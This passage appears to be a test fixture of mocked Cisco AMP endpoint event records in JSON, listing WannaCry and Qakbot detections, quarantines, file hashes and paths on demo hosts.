Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a 
worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 